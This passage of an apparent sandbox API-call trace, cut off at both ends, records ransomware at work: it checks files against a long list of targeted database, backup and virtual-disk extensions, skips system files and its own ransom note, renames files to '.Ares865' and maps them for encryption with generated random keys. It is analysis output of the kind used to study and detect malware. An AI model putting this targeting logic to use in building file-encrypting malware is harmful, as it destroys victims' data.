lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.316] lstrlenW (lpString="dxl") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.316] lstrlenW (lpString="eco") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.316] lstrlenW (lpString="ecx") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.316] lstrlenW (lpString="edb") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.316] lstrlenW (lpString="epim") returned 4 [0086.316] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.316] lstrlenW (lpString="fcd") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.316] lstrlenW (lpString="fdb") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.316] lstrlenW (lpString="fic") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.316] lstrlenW (lpString="flexolibrary") returned 12 [0086.316] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.316] lstrlenW (lpString="fm5") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.316] lstrlenW (lpString="fmp") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.316] lstrlenW (lpString="fmp12") returned 5 [0086.316] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.316] lstrlenW (lpString="fmpsl") returned 5 [0086.316] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.316] lstrlenW (lpString="fol") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.316] lstrlenW (lpString="fp3") returned 3 [0086.316] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.317] lstrlenW (lpString="fp4") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.317] lstrlenW (lpString="fp5") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.317] lstrlenW (lpString="fp7") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.317] lstrlenW (lpString="fpt") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.317] lstrlenW (lpString="frm") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.317] lstrlenW (lpString="gdb") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.317] lstrlenW (lpString="gdb") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.317] lstrlenW (lpString="grdb") returned 4 [0086.317] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.317] lstrlenW (lpString="gwi") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.317] lstrlenW (lpString="hdb") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.317] lstrlenW (lpString="his") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.317] lstrlenW (lpString="ib") returned 2 [0086.317] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.317] lstrlenW (lpString="idb") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.317] lstrlenW (lpString="ihx") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.317] lstrlenW (lpString="itdb") returned 4 [0086.317] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.317] lstrlenW (lpString="itw") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.317] lstrlenW (lpString="jet") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.317] lstrlenW (lpString="jtx") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.317] lstrlenW (lpString="kdb") returned 3 [0086.317] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.318] lstrlenW (lpString="kexi") returned 4 [0086.318] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.318] lstrlenW (lpString="kexic") returned 5 [0086.318] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.318] lstrlenW (lpString="kexis") returned 5 [0086.318] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.318] lstrlenW (lpString="lgc") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.318] lstrlenW (lpString="lwx") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.318] lstrlenW (lpString="maf") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.318] lstrlenW (lpString="maq") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.318] lstrlenW (lpString="mar") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.318] lstrlenW (lpString="marshal") returned 7 [0086.318] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.318] lstrlenW (lpString="mas") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.318] lstrlenW (lpString="mav") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.318] lstrlenW (lpString="maw") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.318] lstrlenW (lpString="mdbhtml") returned 7 [0086.318] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.318] lstrlenW (lpString="mdn") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.318] lstrlenW (lpString="mdt") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.318] lstrlenW (lpString="mfd") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.318] lstrlenW (lpString="mpd") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.318] lstrlenW (lpString="mrg") returned 3 [0086.318] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.319] lstrlenW (lpString="mud") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.319] lstrlenW (lpString="mwb") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.319] lstrlenW (lpString="myd") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.319] lstrlenW (lpString="ndf") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.319] lstrlenW (lpString="nnt") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.319] lstrlenW (lpString="nrmlib") returned 6 [0086.319] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.319] lstrlenW (lpString="ns2") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.319] lstrlenW (lpString="ns3") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.319] lstrlenW (lpString="ns4") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.319] lstrlenW (lpString="nsf") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.319] lstrlenW (lpString="nv") returned 2 [0086.319] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.319] lstrlenW (lpString="nv2") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.319] lstrlenW (lpString="nwdb") returned 4 [0086.319] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.319] lstrlenW (lpString="nyf") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.319] lstrlenW (lpString="odb") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.319] lstrlenW (lpString="odb") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.319] lstrlenW (lpString="oqy") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.319] lstrlenW (lpString="ora") returned 3 [0086.319] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.319] lstrlenW (lpString="orx") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.320] lstrlenW (lpString="owc") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.320] lstrlenW (lpString="p96") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.320] lstrlenW (lpString="p97") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.320] lstrlenW (lpString="pan") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.320] lstrlenW (lpString="pdb") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.320] lstrlenW (lpString="pdm") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.320] lstrlenW (lpString="pnz") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.320] lstrlenW (lpString="qry") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.320] lstrlenW (lpString="qvd") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.320] lstrlenW (lpString="rbf") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.320] lstrlenW (lpString="rctd") returned 4 [0086.320] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.320] lstrlenW (lpString="rod") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.320] lstrlenW (lpString="rodx") returned 4 [0086.320] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.320] lstrlenW (lpString="rpd") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.320] lstrlenW (lpString="rsd") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.320] lstrlenW (lpString="sas7bdat") returned 8 [0086.320] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.320] lstrlenW (lpString="sbf") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.320] lstrlenW (lpString="scx") returned 3 [0086.320] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.320] lstrlenW (lpString="sdb") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.321] lstrlenW (lpString="sdc") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.321] lstrlenW (lpString="sdf") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.321] lstrlenW (lpString="sis") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.321] lstrlenW (lpString="spq") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.321] lstrlenW (lpString="te") returned 2 [0086.321] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.321] lstrlenW (lpString="teacher") returned 7 [0086.321] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.321] lstrlenW (lpString="tmd") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.321] lstrlenW (lpString="tps") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.321] lstrlenW (lpString="trc") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.321] lstrlenW (lpString="trc") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.321] lstrlenW (lpString="trm") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.321] lstrlenW (lpString="udb") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.321] lstrlenW (lpString="udl") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.321] lstrlenW (lpString="usr") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.321] lstrlenW (lpString="v12") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.321] lstrlenW (lpString="vis") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.321] lstrlenW (lpString="vpd") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.321] lstrlenW (lpString="vvv") returned 3 [0086.321] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.321] lstrlenW (lpString="wdb") returned 3 [0086.322] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.322] lstrlenW (lpString="wmdb") returned 4 [0086.322] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.322] lstrlenW (lpString="wrk") returned 3 [0086.322] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.322] lstrlenW (lpString="xdb") returned 3 [0086.322] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.322] lstrlenW (lpString="xld") returned 3 [0086.322] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.322] lstrlenW (lpString="xmlff") returned 5 [0086.322] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.322] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.Ares865") returned 80 [0086.322] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.323] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.324] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=219488) returned 1 [0086.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.325] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.325] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.325] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x35c60, lpName=0x0) returned 0x15c [0086.327] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x35c60) returned 0x420000 [0086.394] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0086.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0086.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.396] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0086.398] CloseHandle (hObject=0x15c) returned 1 [0086.398] CloseHandle (hObject=0x118) returned 1 [0086.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.398] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.399] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x9f560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="..") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="windows") returned -1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="bootmgr") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="temp") returned -1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="boot") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="ids.txt") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="perflogs") returned -1 [0086.399] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="MSBuild") returned 1 [0086.399] lstrlenW (lpString="OUTLLIBR.REST.trx_dll") returned 21 [0086.399] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0086.399] lstrcpyW (in: lpString1=0x2cce468, lpString2="OUTLLIBR.REST.trx_dll" | out: lpString1="OUTLLIBR.REST.trx_dll") returned="OUTLLIBR.REST.trx_dll" [0086.399] lstrlenW (lpString="OUTLLIBR.REST.trx_dll") returned 21 [0086.399] lstrlenW (lpString="Ares865") returned 7 [0086.399] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.399] lstrlenW (lpString=".dll") returned 4 [0086.400] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".dll") returned 1 [0086.400] lstrlenW (lpString=".lnk") returned 4 [0086.400] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".lnk") returned 1 [0086.400] lstrlenW (lpString=".ini") returned 4 [0086.400] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".ini") returned 1 [0086.400] lstrlenW (lpString=".sys") returned 4 [0086.400] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2=".sys") returned 1 [0086.400] lstrlenW (lpString="OUTLLIBR.REST.trx_dll") returned 21 [0086.400] lstrlenW (lpString="bak") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.400] lstrlenW (lpString="ba_") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.400] lstrlenW (lpString="dbb") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.400] lstrlenW (lpString="vmdk") returned 4 [0086.400] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.400] lstrlenW (lpString="rar") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.400] lstrlenW (lpString="zip") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.400] lstrlenW (lpString="tgz") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.400] lstrlenW (lpString="vbox") returned 4 [0086.400] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.400] lstrlenW (lpString="vdi") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.400] lstrlenW (lpString="vhd") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.400] lstrlenW (lpString="vhdx") returned 4 [0086.400] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.400] lstrlenW (lpString="avhd") returned 4 [0086.400] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.400] lstrlenW (lpString="db") returned 2 [0086.400] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.400] lstrlenW (lpString="db2") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.400] lstrlenW (lpString="db3") returned 3 [0086.400] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.401] lstrlenW (lpString="dbf") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.401] lstrlenW (lpString="mdf") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.401] lstrlenW (lpString="mdb") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.401] lstrlenW (lpString="sql") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.401] lstrlenW (lpString="sqlite") returned 6 [0086.401] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.401] lstrlenW (lpString="sqlite3") returned 7 [0086.401] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.401] lstrlenW (lpString="sqlitedb") returned 8 [0086.401] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.401] lstrlenW (lpString="xml") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.401] lstrlenW (lpString="$er") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.401] lstrlenW (lpString="4dd") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.401] lstrlenW (lpString="4dl") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.401] lstrlenW (lpString="^^^") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.401] lstrlenW (lpString="abs") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.401] lstrlenW (lpString="abx") returned 3 [0086.401] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.401] lstrlenW (lpString="accdb") returned 5 [0086.401] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.401] lstrlenW (lpString="accdc") returned 5 [0086.401] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.401] lstrlenW (lpString="accde") returned 5 [0086.401] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.401] lstrlenW (lpString="accdr") returned 5 [0086.401] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.401] lstrlenW (lpString="accdt") returned 5 [0086.402] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.402] lstrlenW (lpString="accdw") returned 5 [0086.402] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.402] lstrlenW (lpString="accft") returned 5 [0086.402] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.402] lstrlenW (lpString="adb") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.402] lstrlenW (lpString="adb") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.402] lstrlenW (lpString="ade") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.402] lstrlenW (lpString="adf") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.402] lstrlenW (lpString="adn") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.402] lstrlenW (lpString="adp") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.402] lstrlenW (lpString="alf") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.402] lstrlenW (lpString="ask") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.402] lstrlenW (lpString="btr") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.402] lstrlenW (lpString="cat") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.402] lstrlenW (lpString="cdb") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.402] lstrlenW (lpString="ckp") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.402] lstrlenW (lpString="cma") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.402] lstrlenW (lpString="cpd") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.402] lstrlenW (lpString="dacpac") returned 6 [0086.402] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.402] lstrlenW (lpString="dad") returned 3 [0086.402] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.403] lstrlenW (lpString="dadiagrams") returned 10 [0086.403] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0086.403] lstrlenW (lpString="daschema") returned 8 [0086.403] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.403] lstrlenW (lpString="db-journal") returned 10 [0086.403] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0086.403] lstrlenW (lpString="db-shm") returned 6 [0086.403] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.403] lstrlenW (lpString="db-wal") returned 6 [0086.403] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.403] lstrlenW (lpString="dbc") returned 3 [0086.403] lstrcmpiW 